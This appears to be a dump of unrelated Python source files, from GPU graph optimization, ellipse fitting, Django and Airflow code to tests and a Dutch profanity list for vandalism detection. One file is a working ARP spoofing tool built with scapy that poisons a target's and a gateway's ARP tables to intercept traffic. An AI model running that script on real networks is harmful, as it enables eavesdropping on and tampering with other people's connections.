if (isinstance(node.op.scalar_op, scalar.basic.Add) or
isinstance(node.op.scalar_op, scalar.basic.Mul)):
x, = node.inputs
greduce = GpuCAReduceCuda(node.op.scalar_op, axis=node.op.axis)
if x.dtype != "float32":
return
gvar = greduce(x)
#We need to have the make node called, otherwise the mask can
#be None
if gvar.owner.op.supports_c_code([gpu_from_host(x)]):
return greduce
else:
# Try to make a simpler pattern based on reshaping
# The principle is that if two adjacent dimensions have
# the same value in the reduce_mask, then we can reshape
# to make them a single dimension, do the reduction, and
# then reshape to get them back.
if node.op.axis is None:
reduce_mask = [1] * x.type.ndim
else:
reduce_mask = [0] * x.type.ndim
for a in node.op.axis:
assert reduce_mask[a] == 0
reduce_mask[a] = 1
shape_of = node.fgraph.shape_feature.shape_of
x_shape = shape_of[x]
new_in_shp = [x_shape[0]]
new_mask = [reduce_mask[0]]
for i in xrange(1, x.type.ndim):
if reduce_mask[i] == reduce_mask[i - 1]:
new_in_shp[-1] *= x_shape[i]
else:
new_mask.append(reduce_mask[i])
new_in_shp.append(x_shape[i])
new_greduce = GpuCAReduceCuda(new_mask, scalar_op)
reshaped_x = x.reshape(tensor.stack(*new_in_shp))
gpu_reshaped_x = gpu_from_host(reshaped_x)
reshaped_gpu_inputs = [gpu_reshaped_x]
if new_greduce.supports_c_code(reshaped_gpu_inputs):
reduce_reshaped_x = host_from_gpu(
new_greduce(gpu_reshaped_x))
if reduce_reshaped_x.ndim != node.outputs[0].ndim:
unreshaped_reduce = reduce_reshaped_x.reshape(
tensor.stack(*shape_of[node.outputs[0]]))
else:
unreshaped_reduce = reduce_reshaped_x
return [unreshaped_reduce]
@register_opt()
@op_lifter([tensor.blas.Gemv])
def local_gpua_gemv(node):
return GpuGemv(inplace=node.op.inplace)
@register_opt()
@op_lifter([tensor.blas_c.CGemv])
def local_gpua_gemv2(node):
return GpuGemv(inplace=node.op.inplace)
@register_opt()
@op_lifter([tensor.blas.Gemm])
def local_gpua_gemm(node):
return GpuGemm(inplace=node.op.inplace)
@register_opt()
@op_lifter([tensor.blas.Dot22])
def local_gpua_dot22(node):
return gpu_dot22
@register_opt()
@op_lifter([tensor.basic.Eye])
def local_gpua_eye(node):
return GpuEye(dtype=node.op.dtype)
@register_opt()
@op_lifter([tensor.nnet.CrossentropySoftmaxArgmax1HotWithBias])
def local_gpua_crossentropysoftmaxargmax1hotwithbias(node):
return GpuCrossentropySoftmaxArgmax1HotWithBias()
@register_opt()
@op_lifter([tensor.nnet.CrossentropySoftmax1HotWithBiasDx])
def local_gpua_crossentropysoftmax1hotwithbiasdx(node):
return GpuCrossentropySoftmax1HotWithBiasDx()
@register_opt()
@op_lifter([tensor.nnet.Softmax])
def local_gpua_softmax(node):
return GpuSoftmax()
@register_opt()
@op_lifter([tensor.nnet.SoftmaxWithBias])
def local_gpua_softmaxwithbias(node):
return GpuSoftmaxWithBias()
@register_opt()
@op_lifter([gpu_from_host, ConvOp])
def local_gpu_conv(node):
"""
gpu_from_host(conv) -> gpu_conv(gpu_from_host)
conv(host_from_gpu) -> host_from_gpu(gpu_conv)
"""
def GpuConvOp_from_ConvOp(op):
logical_img_hw = None
if op.kshp_logical is not None and op.kshp_logical != op.kshp:
return None
#print op.kshp, op.imshp[1:3]
#print op.kshp_logical, logical_img_hw
ret = GpuConv(border_mode=op.out_mode,
subsample=(op.dx, op.dy),
logical_img_hw=logical_img_hw,
logical_kern_hw=op.kshp_logical,
logical_kern_align_top=op.kshp_logical_top_aligned,
kshp=op.kshp,
version=op.version,
verbose=op.verbose,
imshp=op.imshp,
)
if op.imshp_logical is not None:
logical_img_hw = op.imshp_logical[1:3]
if logical_img_hw != op.imshp[1:3]:
# this case is not implemented
#return None
rstride = int(numpy.ceil(op.imshp_logical[1] /
float(op.imshp[1])))
cstride = int(numpy.ceil(op.imshp_logical[2] /
float(op.imshp[2])))
def make_graph(img, kern):
buf = tensor.alloc(numpy.asarray(0, dtype=img.dtype),
img.shape[0], *op.imshp_logical)
img = tensor.set_subtensor(buf[:, :, ::rstride, ::cstride],
img)
img = gpu_from_host(img)
return ret(img, kern)
return make_graph
return ret
def values_eq_approx(a, b):
"""This fct is needed to don't have DebugMode raise useless
error due to ronding error.
This happen as We reduce on the two last dimensions, so this
can raise the absolute error if the number of element we
reduce on is significant.
"""
assert a.ndim == 4
atol = None
if a.shape[-1] * a.shape[-2] > 100:
#For float32 the default atol is 1e-5
atol = 3e-5
return GpuArrayType.values_eq_approx(a, b, atol=atol)
img, kern = node.inputs
gpu_conv = GpuConvOp_from_ConvOp(node.op)
if gpu_conv is None:
return
out = gpu_conv(gpu_from_host(img),
gpu_from_host(kern))
# in some case the ConvOp broadcast the last 2 dimensions
# differently then the gpu ConvOp
out = tensor.patternbroadcast(
host_from_gpu(out),
node.outputs[0].broadcastable)
#op_lifter want the output on the GPU.
out = gpu_from_host(out)
out.values_eq_approx = values_eq_approx
return [out]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:mod:`fit`
==================
.. module:: fit
:synopsis:
.. moduleauthor:: hbldh <henrik.blidh@swedwise.com>
Created on 2015-09-24, 07:18:22
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import numpy as np
from b2ac.compat import *
import b2ac.matrix.matrix_operations as mo
import b2ac.eigenmethods.qr_algorithm as qr
import b2ac.eigenmethods.inverse_iteration as inv_iter
def fit_improved_B2AC_double(points):
"""Ellipse fitting in Python with improved B2AC algorithm as described in
this `paper <http://autotrace.sourceforge.net/WSCG98.pdf>`_.
This version of the fitting uses float storage during calculations and performs the
eigensolver on a float array. It only uses `b2ac` package methods for fitting, to
be as similar to the integer implementation as possible.
:param points: The [Nx2] array of points to fit ellipse to.
:type points: :py:class:`numpy.ndarray`
:return: The conic section array defining the fitted ellipse.
:rtype: :py:class:`numpy.ndarray`
"""
e_conds = []
points = np.array(points, 'float')
M, T = _calculate_M_and_T_double(points)
e_vals = sorted(qr.QR_algorithm_shift_Givens_double(M)[0])
a = None
for ev_ind in [1, 2, 0]:
# Find the eigenvector that matches this eigenvector.
eigenvector = inv_iter.inverse_iteration_for_eigenvector_double(M, e_vals[ev_ind], 5)
# See if that eigenvector yields an elliptical solution.
elliptical_condition = (4 * eigenvector[0] * eigenvector[2]) - (eigenvector[1] ** 2)
e_conds.append(elliptical_condition)
if elliptical_condition > 0:
a = eigenvector
break
if a is None:
print("Eigenvalues = {0}".format(e_vals))
print("Elliptical conditions = {0}".format(e_conds))
raise ArithmeticError("No elliptical solution found.")
conic_coefficients = np.concatenate((a, np.dot(T, a)))
return conic_coefficients
def _calculate_M_and_T_double(points):
"""Part of the B2AC ellipse fitting algorithm, calculating the M and T
matrices needed.
:param points: The [Nx2] array of points to fit ellipse to.
:type points: :py:class:`numpy.ndarray`
:return: Matrices M and T.
:rtype: tuple
"""
S = _calculate_scatter_matrix_double(points[:, 0], points[:, 1])
S1 = S[:3, :3]
S3 = np.array([S[3, 3], S[3, 4], S[3, 5], S[4, 4], S[4, 5], S[5, 5]])
S3_inv = mo.inverse_symmetric_3by3_double(S3).reshape((3, 3))
S2 = S[:3, 3:]
T = -np.dot(S3_inv, S2.T)
M_term_2 = np.dot(S2, T)
M = S1 + M_term_2
M[[0, 2], :] = M[[2, 0], :] / 2
M[1, :] = -M[1, :]
return M, T
def _calculate_scatter_matrix_double(x, y):
"""Calculates the complete scatter matrix for the input coordinates.
:param x: The x coordinates.
:type x: :py:class:`numpy.ndarray`
:param y: The y coordinates.
:type y: :py:class:`numpy.ndarray`
:return: The complete scatter matrix.
:rtype: :py:class:`numpy.ndarray`
"""
D = np.ones((len(x), 6), 'int64')
D[:, 0] = x * x
D[:, 1] = x * y
D[:, 2] = y * y
D[:, 3] = x
D[:, 4] = y
return D.T.dot(D)
|
from django.core.exceptions import PermissionDenied
from django.utils.crypto import get_random_string
from rest_framework_jwt.settings import api_settings
from utils.constants import AUTO_GENERATED_PASSWORD_LENGTH
# binding.pry equivalent
# import code; code.interact(local=locals())
def get_hustler_data(hustler_object):
"""
Serializes a Hustler object for JSON
:param hustler_object: Hustler object
:return: dict
"""
from hustlers.api.serializers import HustlerSerializer
serialized_hustler_data = HustlerSerializer(hustler_object).data
return serialized_hustler_data
def jwt_response_payload_handler(token=None, user=None, request=None):
"""
Custom JWT payload creator
/auth/login/ will redirects to this endpoint
User auth using tokens or user object wrapper around vanilla auth/login
:param token: JWT token
:param user: User object
:param request: Request object
:return: dict
"""
if hasattr(user, "hustler"):
if user.is_active is False:
raise PermissionDenied("Hustler is inactive")
else:
raise PermissionDenied("Hustler does not exist!")
hustler_data = get_hustler_data(user.hustler)
if token is None:
jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
payload = jwt_payload_handler(user)
token = jwt_encode_handler(payload)
return_data = {"auth_token": token, "hustler_data": hustler_data}
return return_data
def generate_hustler_password(length_of_password=AUTO_GENERATED_PASSWORD_LENGTH):
"""
:param length_of_password:
:return:
"""
return get_random_string(length_of_password)
|
from .handlers import bp
__all__ = ("bp",)
|
import traceback
from typing import Union, Callable
from functools import wraps, partial
from asyncio import iscoroutinefunction
from lite_tools.utils_jar.logs import my_logger, logger, handle_exception
__ALL__ = ["try_catch"]
def try_catch(func=None, *,
default=None, log: Union[bool, str] = True, catch: bool = False,
err_callback: Callable = None, err_args: tuple = None):
"""
异常捕获装饰器
-->不加参数 就是把异常捕获了 返回None
-->加了参数==参数如下:
:param func :
:param default : 默认的返回值
:param log : 是否打印报错信息,默认是打印的(如果传入指定的内容 那么就会报错指定内容)
:param catch : 按栈方式捕获异常
:param err_callback: 当出现错误的时候调用的回调函数,只需要传入方法名即可
:param err_args : 如果有参数请用元组方式传进来 这里需要结合你自己的err_callback 参考见demo
"""
if func is None:
return partial(try_catch, default=default, log=log, catch=catch, err_callback=err_callback, err_args=err_args)
def __log_true():
line, fl, exception_type, exception_detail = handle_exception(traceback.format_exc(), func.__name__)
if err_callback is not None:
try:
if isinstance(err_args, tuple):
err_callback(*err_args)
else:
err_callback()
except Exception as err:
if log is True:
logger.error(f"传入的回调函数不存在或者报错: {err}")
if catch is True:
logger.opt(exception=True, colors=True, capture=True).error("Information: ↓ ↓ ↓ ")
elif log and isinstance(log, str):
logger.error(log)
else:
my_logger(fl, func.__name__, line, f"{exception_type} --> {exception_detail}")
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except KeyboardInterrupt:
exit(0)
except Exception as err:
_ = err
if log:
__log_true()
return default
@wraps(func)
async def async_wrapper(*args, **kwargs):
try:
return await func(*args, **kwargs)
except KeyboardInterrupt:
exit(0)
except Exception as err:
_ = err
if log:
__log_true()
return default
return async_wrapper if iscoroutinefunction(func) else wrapper
|
"""
Code that goes along with the Airflow located at:
http://airflow.readthedocs.org/en/latest/tutorial.html
"""
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import datetime, timedelta
from airflow.operators.python_operator import PythonOperator
import calcul
import init
import insert
default_args = {
"owner": "airflow",
"depends_on_past": False,
"start_date": datetime(2015, 6, 1),
"email": ["airflow@airflow.com"],
"email_on_failure": False,
"email_on_retry": False,
"retries": 1,
"retry_delay": timedelta(minutes=5),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
}
dag = DAG("tutorial", default_args=default_args,
schedule_interval=timedelta(1))
# t1, t2 and t3 are examples of tasks created by instantiating operators
t1 = PythonOperator(task_id="calcul", python_callable=calcul.calcul, dag=dag)
t2 = PythonOperator(task_id="init", python_callable=init.init, dag=dag)
t3 = PythonOperator(task_id="insert", python_callable=insert.insert, dag=dag)
t2.set_upstream(t1)
t3.set_upstream(t2)
|
# This file is part of Indico.
# Copyright (C) 2002 - 2020 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import unicode_literals
from indico.modules.events.controllers.admin import (RHCreateEventLabel, RHCreateReferenceType, RHDeleteEventLabel,
RHDeleteReferenceType, RHEditEventLabel, RHEditReferenceType,
RHEventLabels, RHReferenceTypes)
from indico.modules.events.controllers.creation import RHCreateEvent
from indico.modules.events.controllers.display import RHEventAccessKey, RHEventMarcXML, RHExportEventICAL
from indico.modules.events.controllers.entry import event_or_shorturl
from indico.web.flask.util import make_compat_redirect_func, redirect_view
from indico.web.flask.wrappers import IndicoBlueprint
_bp = IndicoBlueprint('events', __name__, template_folder='templates', virtual_template_folder='events')
# Admin
_bp.add_url_rule('/admin/external-id-types/', 'reference_types', RHReferenceTypes, methods=('GET', 'POST'))
_bp.add_url_rule('/admin/external-id-types/create', 'create_reference_type', RHCreateReferenceType,
methods=('GET', 'POST'))
_bp.add_url_rule('/admin/event-labels/', 'event_labels', RHEventLabels, methods=('GET', 'POST'))
_bp.add_url_rule('/admin/event-labels/create', 'create_event_label', RHCreateEventLabel, methods=('GET', 'POST'))
# Single reference type
_bp.add_url_rule('/admin/external-id-types/<int:reference_type_id>/edit', 'update_reference_type', RHEditReferenceType,
methods=('GET', 'POST'))
_bp.add_url_rule('/admin/external-id-types/<int:reference_type_id>', 'delete_reference_type', RHDeleteReferenceType,
methods=('DELETE',))
# Single event label
_bp.add_url_rule('/admin/event-labels/<int:event_label_id>/edit', 'update_event_label', RHEditEventLabel,
methods=('GET', 'POST'))
_bp.add_url_rule('/admin/event-labels/<int:event_label_id>', 'delete_event_label', RHDeleteEventLabel,
methods=('DELETE',))
_bp.add_url_rule('/event/<confId>/event.ics', 'export_event_ical', RHExportEventICAL)
# Creation
_bp.add_url_rule('/event/create/<any(lecture,meeting,conference):event_type>', 'create', RHCreateEvent,
methods=('GET', 'POST'))
# Main entry points supporting shortcut URLs
# /e/ accepts slashes, /event/ doesn't - this is intended. We do not want to support slashes in the old namespace
# since it's a major pain in the ass to do so (and its route would eat anything that's usually a 404)
_bp.add_url_rule('/e/<path:confId>', 'shorturl', event_or_shorturl, strict_slashes=False,
defaults={'shorturl_namespace': True})
_bp.add_url_rule('/event/<confId>/', 'display', event_or_shorturl)
_bp.add_url_rule('/event/<confId>/overview', 'display_overview', event_or_shorturl, defaults={'force_overview': True})
_bp.add_url_rule('/event/<confId>/other-view', 'display_other', redirect_view('timetable.timetable'))
# Misc
_bp.add_url_rule('/event/<confId>/key-access', 'key_access', RHEventAccessKey, methods=('POST',))
_bp.add_url_rule('/event/<confId>/event.marc.xml', 'marcxml', RHEventMarcXML)
# Legacy URLs
_compat_bp = IndicoBlueprint('compat_events', __name__)
_compat_bp.add_url_rule('/conferenceDisplay.py', 'display_modpython', make_compat_redirect_func(_bp, 'display'))
_compat_bp.add_url_rule('/conferenceOtherViews.py', 'display_other_modpython',
make_compat_redirect_func(_bp, 'display_other'))
_compat_bp.add_url_rule('/conferenceDisplay.py/overview', 'display_overview_modpython',
make_compat_redirect_func(_bp, 'display_overview'))
_compat_bp.add_url_rule('/event/<confId>/my-conference/', 'display_mystuff', make_compat_redirect_func(_bp, 'display'))
_compat_bp.add_url_rule('/myconference.py', 'display_mystuff_modpython', make_compat_redirect_func(_bp, 'display'))
|
from .conversions import (get_interaction_operator,
get_diagonal_coulomb_hamiltonian, get_molecular_data,
get_quadratic_hamiltonian)
from .fourier_transforms import fourier_transform, inverse_fourier_transform
from .operator_tapering import freeze_orbitals, prune_unused_indices
from .qubit_operator_transforms import (project_onto_sector, projection_error,
rotate_qubit_by_pauli)
from .qubit_tapering_from_stabilizer import (StabilizerError,
check_commuting_stabilizers,
check_stabilizer_linearity,
reduce_number_of_terms,
taper_off_qubits, fix_single_term)
from .weyl_ordering import (mccoy, weyl_polynomial_quantization,
symmetric_ordering)
|
import BaseClass
from AModule import aFunc, bFunc
class AClass( BaseClass.ABaseClass ):
def __init__( self, val1, val2 ):
super( ABaseClass, self ).__init__( val1 )
self.val2 = val2
def meth1( self, aval ):
val = self.val1 * self.val2 + aval
return super( ABaseClass, self ).meth1( val )
def meth2( self, astr ):
return func( astr, self.val1, self.val2 );
def func( a, b, c ):
x = aFunc( a, b )
return bFunc( c, x )
|
import hashlib
import re
from trac.config import *
from trac.core import *
from userpictures import IUserPicturesProvider
class UserPicturesGravatarProvider(Component):
implements(IUserPicturesProvider)
# from trac source
_long_author_re = re.compile(r'.*<([^@]+)@([^@]+)>\s*|([^@]+)@([^@]+)')
@property
def email_map(self):
if hasattr(self, '_email_map'):
return self._email_map
_email_map = {}
for username, name, email in self.env.get_known_users():
_email_map[username] = email
setattr(self, '_email_map', _email_map)
return self._email_map
def get_src(self, req, username, size):
email = ''
if '@' not in username:
if username != 'anonymous':
email = self.email_map.get(username) or ''
else:
author_info = self._long_author_re.match(username)
if author_info:
if author_info.group(1):
email = '%s@%s' % author_info.group(1, 2)
elif author_info.group(3):
email = '%s@%s' % author_info.group(3, 4)
email_hash = hashlib.md5(email).hexdigest()
if req.base_url.startswith("https://"):
href = "https://gravatar.com/avatar/" + email_hash
else:
href = "http://www.gravatar.com/avatar/" + email_hash
href += "?size=%s" % size
return href
|
import os
import json
from keras.models import Model
STORE_DIR = os.path.dirname(__file__)
def save_model(
model: Model,
name: str,
embedding_size: int,
epochs: int,
batch_size: int,
validation_split: float) -> None:
"""
save the keras model to the storage directory.
:param model: Model
:param name : str
-> name of this model to differentiate it from other ones
with the same set of parameters
:param embedding_size : int (min: 0, max: 999)
:param epochs : int (min: 0, max: 9999)
:param batch_size : int (min: 0, max: 999)
:param validation_split : float (min: 0.0, max: 1.0)
"""
file_path = get_model_title(name, embedding_size, epochs, batch_size, validation_split)
print("storing model into %s" % file_path)
model.save(file_path)
def save_model_metadata(
metadata: dict,
name: str,
embedding_size: int,
epochs: int,
batch_size: int,
validation_split: float) -> None:
""" store the model's metadata, see save_model for parameters """
file_path = get_model_title(name, embedding_size, epochs, batch_size, validation_split)
print("storing model metadata into %s" % file_path)
file_path_json = file_path.replace(".h5", ".json")
with open(file_path_json, "w") as model_metadata_file:
json.dump(metadata, model_metadata_file)
def load_model_metadata(model_path: str) -> dict:
model_path_json = model_path.replace(".h5", ".json")
print("loading model matadata from %s" % model_path_json)
with open(model_path_json, "r") as model_metadata_file:
content = model_metadata_file.read()
return json.loads(content)
def get_model_title(
name: str,
embedding_size: int,
epochs: int,
batch_size: int,
validation_split: float) -> str:
"""
Same parameters as save_model. See above.
"""
model_suffix = _get_model_suffix(embedding_size, epochs, batch_size, validation_split)
file_path = "%s/%s__%s.h5" % (STORE_DIR, name, model_suffix)
return file_path
def _get_model_suffix(
embedding_size: int,
epochs: int,
batch_size: int,
validation_split: float) -> str:
"""
returns a suffix to add to the model name when saving. this
suffix encodes the model's hyperparameters.
This has the same parameters as save_model. See above.
:return : str
"""
es = str(embedding_size).rjust(3, "0")
ep = str(epochs).rjust(4, "0")
bs = str(batch_size).rjust(3, "0")
vs = str(round(validation_split, 3)).ljust(5, "0").replace(".", "-")
return "%s_%s_%s_%s" % (es, ep, bs, vs)
|
# Copyright 2021 Sheng Wang.
# Affiliation: Mathematical Institute, University of Oxford
# Email: sheng.wang@maths.ox.ac.uk
import os
import random
import numpy as np
import marketmodel.loader as loader
import marketmodel.utils as utils
from marketmodel.loader import DataHestonSlv
from marketmodel.factors import PrepTrainData, DecodeFactor
from marketmodel.neuralsde import Train, Simulate
def run():
# load Heston-SLV simulation data
fname = 'input/sim_hestonslv.pkl'
St, vt, list_exp, list_mny, cs_ts_raw, cs_ts, mask_quality_value, \
Ts, ks, mat_A, vec_b = loader.load_hestonslv_data(fname)
# load configurations
hp_sde_transform = utils.Config.hp_sde_transform
hp_model_S = utils.Config.hp_model_S
hp_model_mu = utils.Config.hp_model_mu
hp_model_xi = utils.Config.hp_model_xi
# fit an initial model for S
dir_initial_model_S = 'output/checkpoint/initial_model_S/'
X_S, Y_S = PrepTrainData.prep_data_model_S_initial(
St, cs_ts, max_PC=7, factor_multiplier=1e5)
model_S_initial = Train.train_S(X_S, Y_S,
hp_model_S['pruning_sparsity'],
hp_model_S['validation_split'],
hp_model_S['batch_size'],
hp_model_S['epochs'],
rand_seed=0, force_fit=False,
model_name='model_S',
out_dir=dir_initial_model_S)
# calculate derivatives for the normalised call prices
cT_ts, cm_ts, cmm_ts = PrepTrainData.calc_call_derivatives(
list_mny, list_exp, cs_ts_raw, mask_quality_value)
# decode factor
G, X, dX, S, dS, W, b, idxs_remove, scales_X = \
DecodeFactor.decode_factor_dasa(
cs_ts, St, model_S_initial, X_S, cT_ts, cm_ts, cmm_ts, mat_A, vec_b,
hp_sde_transform['norm_factor'])
cT_ts = np.delete(cT_ts, idxs_remove, axis=0)
cm_ts = np.delete(cm_ts, idxs_remove, axis=0)
cmm_ts = np.delete(cmm_ts, idxs_remove, axis=0)
# calibrate a hypterparameter for normalising distance
dist_X = np.abs(W.dot(X.T) - b[:, None]) / \
np.linalg.norm(W, axis=1, keepdims=True)
critical_threshold = hp_sde_transform['frac_critical_threshold'] * np.min(
np.max(dist_X, axis=1))
dist_multiplier = (1. / (
1 - hp_sde_transform['critical_value']) - 1) / critical_threshold
# pre-calculate diffusion scaling data
proj_scale = hp_sde_transform['proj_scale']
Omegas, det_Omega, proj_dX = PrepTrainData.calc_diffusion_scaling(
W, b, X, dX, dist_multiplier, proj_scale)
# pre-calculate drift correction data
X_interior, corr_dirs, epsmu = PrepTrainData.calc_drift_correction(
W, b, X, hp_sde_transform['rho_star'], hp_sde_transform['epsmu_star'])
# set paths
run_batch_name = 'train_batch_1'
out_dir = f'output/checkpoint/{run_batch_name}/'
out_dir_plot = out_dir + 'plot/'
print(f'Write in the folder {out_dir}.')
if not os.path.exists(out_dir):
os.mkdir(out_dir)
if not os.path.exists(out_dir_plot):
os.mkdir(out_dir_plot)
list_rand_seed = [5]
list_sim_rand_seed = [5]
for rand_seed in list_rand_seed:
# set random seed
os.environ['PYTHONHASHSEED'] = str(rand_seed)
random.seed(rand_seed)
np.random.seed(rand_seed)
# train the model for S
X_S, Y_S = PrepTrainData.prep_data_model_S(
S, dS, X, hp_model_xi['factor_multiplier'])
model_S = Train.train_S(X_S, Y_S,
hp_model_S['pruning_sparsity'],
hp_model_S['validation_split'],
hp_model_S['batch_size'],
hp_model_S['epochs'],
rand_seed=rand_seed, force_fit=False,
model_name='model_S',
out_dir=out_dir)
# fit model for the baseline drift
mu_base = PrepTrainData.calc_baseline_drift(
cT_ts, cm_ts, cmm_ts, model_S, X_S, G, scales_X)
model_mu = Train.train_mu(X_S, mu_base,
hp_model_mu['validation_split'],
hp_model_mu['batch_size'],
hp_model_mu['epochs'],
rand_seed=rand_seed, force_fit=False,
model_name='model_mu',
out_dir=out_dir)
# train the model for xi
mu_base_est = model_mu.predict(X_S)
z_ts = PrepTrainData.calc_zt(cT_ts, cm_ts, cmm_ts, model_S, X_S)
X_xi, Y_xi = PrepTrainData.prepare_data_model_xi(
S, X, proj_dX, Omegas, det_Omega, corr_dirs, epsmu, mu_base_est, z_ts,
hp_model_xi['factor_multiplier'])
model_xi = Train.train_xi(X_xi, Y_xi, W, G,
hp_model_xi['lbd_penalty_eq'],
hp_model_xi['lbd_penalty_sz'],
hp_model_xi['pruning_sparsity'],
hp_model_mu['validation_split'],
hp_model_mu['batch_size'],
hp_model_xi['epochs'],
rand_seed=rand_seed, force_fit=False,
model_name='model_xi', out_dir=out_dir)
# forward simulation
N = 10000
dt = 1e-3
for sim_rand_seed in list_sim_rand_seed:
out_dir_sim = out_dir + 'sim/'
if not os.path.exists(out_dir_sim):
os.mkdir(out_dir_sim)
Simulate.simulate_S_xi(
dt, N, model_S, model_xi, model_mu, S, X, W, b,
hp_model_xi['factor_multiplier'], dist_multiplier, proj_scale,
hp_sde_transform['rho_star'], hp_sde_transform['epsmu_star'],
X_interior,
rand_seed, sim_rand_seed,
force_simulate=True, reflect=False, out_dir=out_dir_sim)
if __name__ == '__main__':
run()
|
# Generated by Django 3.2 on 2021-11-17 23:57
from django.db import migrations, models
import django.db.models.deletion
import news.models
class Migration(migrations.Migration):
dependencies = [
('events', '0011_auto_20211117_2214'),
('news', '0006_auto_20211117_2219'),
]
operations = [
migrations.AlterField(
model_name='news',
name='supporters',
field=models.ManyToManyField(blank=True, help_text='Show logos/links', to='events.Supporter'),
),
migrations.AlterField(
model_name='news',
name='tags',
field=models.ManyToManyField(blank=True, to='events.Tag'),
),
migrations.CreateModel(
name='NewsImage',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.FileField(upload_to=news.models.get_upload_dir)),
('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='news.news')),
],
),
]
|
#!/usr/bin/env python
import scapy.all as scapy
import time
import sys
import argparse
def get_range():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target", help="use this to set the target ip")
parser.add_argument("-r", "--spoof", dest="gateway", help="use this to set the gateway ip")
options = parser.parse_args()
if not options.target:
parser.error("[-] Please specify the target's IP, use --help for more info")
elif not options.gateway:
parser.error("[-] Please specify the gateway IP, use --help for more info")
return options
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
return answered_list[0][1].hwsrc
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, psrc=spoof_ip, pdst=target_ip, hwdst=target_mac)
scapy.send(packet, verbose=False)
def restore(dst_ip, src_ip):
dst_mac = get_mac(dst_ip)
src_mac = get_mac(src_ip)
packet = scapy.ARP(op=2, pdst=dst_ip, psrc=src_ip, hwdst=dst_mac, hwsrc=src_mac)
scapy.send(packet, count=10, verbose=False)
args = get_range()
try:
packet_count = 0
while True:
print("\r[+] Packets sent: " + str(packet_count)),
spoof(args.target, args.gateway)
spoof(args.gateway, args.target)
packet_count += 2
sys.stdout.flush()
time.sleep(1)
except KeyboardInterrupt:
print("\n\n[+] Detected CTRL + C...... \nResetting ARP tables. Please wait.....")
restore(args.gateway, args.target)
restore(args.target, args.gateway)
|
def process(self):
self.edit("PRESENTATION FORM FOR")
self.edit("LOW LINE", "underscore")
self.edit("LEFT PARENTHESIS", "parenleft")
self.edit("RIGHT PARENTHESIS", "parenright")
self.edit("LEFT CURLY BRACKET", "braceleft")
self.edit("RIGHT CURLY BRACKET", "braceright")
self.edit("DOUBLE WAVY", "dblwavy")
self.replace("DOUBLE", "dbl")
self.edit("WAVY", "wavy")
self.edit("DASHED", "dashed")
self.edit("CENTRELINE", "centerline")
self.edit("LEFT", "left")
self.edit("RIGHT", "right")
self.edit("VERTICAL", "vertical")
# self.edit("SQUARE", "fullwidth")
# self.edit("IDEOGRAPHIC TELEGRAPH SYMBOL FOR", "telegraph")
# self.edit("-")
# self.processAs("Helper Digit Names")
self.lower()
self.compress()
if __name__ == "__main__":
from glyphNameFormatter.exporters import printRange
printRange("CJK Compatibility Forms")
|
import pytest
from wazimap_ng.profile.serializers import ProfileSerializer, FullProfileSerializer
from tests.cms.factories import PageFactory, ContentFactory
from tests.profile.factories import ProfileFactory
@pytest.fixture
def profile():
return ProfileFactory(name="Test Profile")
@pytest.fixture
def page(profile):
return PageFactory(profile=profile, name="Test Page", api_mapping="help_text")
@pytest.fixture
def content(page):
return ContentFactory(
page=page, title="Title for test page", text="Text for 1st content page", order=0
)
@pytest.mark.django_db
class TestProfileSerializer:
def test_output_without_pages(self, profile):
serializer = ProfileSerializer(profile)
assert serializer.data["name"] == "Test Profile"
assert serializer.data["configuration"] == {}
def test_output_with_pages_but_no_content(self, profile, page):
serializer = ProfileSerializer(profile)
assert page.name == "Test Page"
assert serializer.data["name"] == "Test Profile"
assert serializer.data["configuration"] == {}
def test_output_with_pages_with_content(self, profile, page, content):
serializer = ProfileSerializer(profile)
assert page.name == "Test Page"
assert serializer.data["name"] == "Test Profile"
assert serializer.data["configuration"] == {
"help_text": [{
"image": None,
"title": "Title for test page",
"text": "Text for 1st content page"
}]
}
@pytest.mark.django_db
class TestFullProfileSerializer:
def test_output_without_pages(self, profile):
serializer = FullProfileSerializer(profile)
assert serializer.data["name"] == "Test Profile"
assert serializer.data["configuration"] == {}
def test_output_with_pages_but_no_content(self, profile, page):
serializer = ProfileSerializer(profile)
assert page.name == "Test Page"
assert serializer.data["name"] == "Test Profile"
assert serializer.data["configuration"] == {}
def test_output_with_pages_with_content(self, profile, page, content):
serializer = ProfileSerializer(profile)
assert page.name == "Test Page"
assert serializer.data["name"] == "Test Profile"
assert serializer.data["configuration"] == {
"help_text": [{
"image": None,
"title": "Title for test page",
"text": "Text for 1st content page"
}]
}
|
import pickle
from revscoring.datasources import revision_oriented
from revscoring.dependencies import solve
from revscoring.languages import dutch
from .util import compare_extraction
BAD = [
# Curses
"aars", # ass
"anaal", "anus", # anal, anus
"balhaar", # ball hair (testicular hair)
"debiel", # infirm
"diaree", "diarree", # diarrhea
"drol", "drollen", # turd
"fack", "facking", "focking", # misspelling of "fuck"
"flikker", "flikkers", # perjorative for gay person ("faggot")
"geil", "geile", # horny
"gelul", # bullshit
"hoer", "hoere", "hoeren", # whore
"homo", "homos", # add "homo's" ; perjorative for gay person
"kak", "kaka", # poop
"kakhoofd", "kakken", # kakhoofd = poopy head; kakken = to poop (verb)
"kanker", "kenker", # cancer
"klootzak", "klootzakken", # "ball sack"
"klote", # lit.: balls; equivalent: "sucky"
"kolere", "klere", # Chollera
"kont", "kontgat", # butt, butthole
"kontje", # little butt
"lekkerding", "lekker ding", # means something like "hot piece"
"likken", # lick (not totally sure why this is here)
"pedo", # add "pedofiel"; pedophile
